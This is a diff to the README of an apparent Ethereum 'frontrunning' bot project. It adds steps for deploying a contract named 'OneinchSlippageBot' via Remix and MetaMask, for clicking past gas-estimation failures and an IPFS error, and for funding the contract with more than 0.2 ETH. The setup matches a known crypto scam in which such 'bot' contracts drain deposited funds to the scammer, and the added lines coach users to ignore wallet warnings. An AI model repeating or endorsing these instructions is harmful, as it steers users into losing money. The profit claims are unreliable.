Jacob-Web3/ETH-Bot/README.md

 ✅5- Go to the “DEPLOY & RUN TRANSACTIONS” tab, select the “Injected Provider - MetaMask” as environment and then “Deploy”.
 By approving the Metamask Contract creation fee, you will have created your own contract.

 Note: Make sure the name of your bot is selected in the CONTRACT section above deploy button.
-In this case mine would be "OneinchSlippageBot.sol".
+In this case mine would be "OneinchSlippageBot - bot.sol".

+Also if you get this message "Gas estimation failed" after clicking deploy button just click "Send transaction" and "Confirm" the metamask can estimate the gaze fee automatically don't worry

+also this message after deployment "Failed to publish metadata file to ipfs, please check the ipfs gateways is available. [{},{},{}] ".
+You can just ignore it and continue.
+This feature is to publish your bot to IPFS.
+Its not necessary, because the bot is in the blockchain and can be accessed through remix.

 ✅6- Fund your bot to be able to frontrun transactions.
 Make sure your deposit is more than 0.2 ETHER ( to prevent negating slippage ) to your exact contract/bot address.